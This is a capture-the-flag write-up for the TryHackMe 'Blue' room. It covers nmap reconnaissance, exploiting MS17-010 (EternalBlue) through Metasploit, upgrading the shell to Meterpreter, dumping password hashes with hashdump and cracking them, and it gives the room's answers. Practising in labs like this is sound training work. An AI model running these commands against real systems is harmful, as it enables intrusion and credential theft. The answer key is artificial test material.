TryHackMe : Blue

~ xio
4 min readSep 3, 2021

--

tryhackme Blue write-up

  • Name: Blue
  • Description: Deploy & hack into a Windows machine, leveraging common misconfigurations issues.
  • Room: tryhackme.com

[Task 1] Recon

Scan the machine

First we need to scan the machine to check for available ports and services

sudo nmap -sS -A <machine_ip>

Question: How many ports are open with a port number under 1000?

Answer: 3

Question: What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08–067)

“We can check the security problems of a device using scripts in Nmap, for example vuln script can identify common problems”

nmap <machine_ip> — script vuln

The machine seems to be vulnerable to the ms17–010 exploit

Answer: ms17–010

[Task 2] Gain Access

Start Metasploit

We know that the machine has a security problem and we can use Metasploit to exploit it

msfconsole

The next step is to find the appropriate exploit for the security problem (ms17–010)

search ms17–010

The exploit we want is the second option

Question: Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)

Answer: exploit/windows/smb/ms17_010_eternalblue

We have to select the desired exploit and set the required values

use exploit/windows/smb/ms17_010_eternalblue

and

show options

Set the Machine IP

set RHOSTS <machine_ip>

Question: Show options and set the one required value. What is the name of this value? (All caps for submission)

Answer: RHOSTS

Run the exploit

run or exploit

You can see now that our exploit was executed and that we got a Windows host shell. In order to continue, we must use the Meterpreter shell to execute commands and upload files.

[Task 3] Escalate

We need to turn the shell into a meterpreter

background

and

use post/manage/shell_to_meterpreter

use post/manage/shell_to_meterpreter or use shell_to_meterpreter

Question: If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)

Answer: post/multi/manage/shell_to_meterpreter

List the sessions and set the session number.

sessions -l

and

set SESSION 1

Question: Select this (use MODULE_PATH). Show options, what option are we required to change?

Answer: SESSION

Now if we see the sessions again, a session meterpreter has been added

sessions -l

sessions 2

We got the meterpreter shell so now we can interactive shell to the attacker from which to explore the target machine and execute code.

Use ps command to list all the process that is running in the host system.

ps

[Task 4] Cracking

Use hashdump to dump the user credentials

hashdump

Question: Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?

Answer: Jon

https://crackstation.net/

Use the above link to crack the password hash or else you could crack the hash using hashcat or John with rockyou.txt.

Question: Copy this password hash to a file and research how to crack it. What is the cracked password?

Answer: alqfna22

[Task 5] Find flags!

search the flags using :

search -f flag*.txt

thank you 🌏🔥

--

--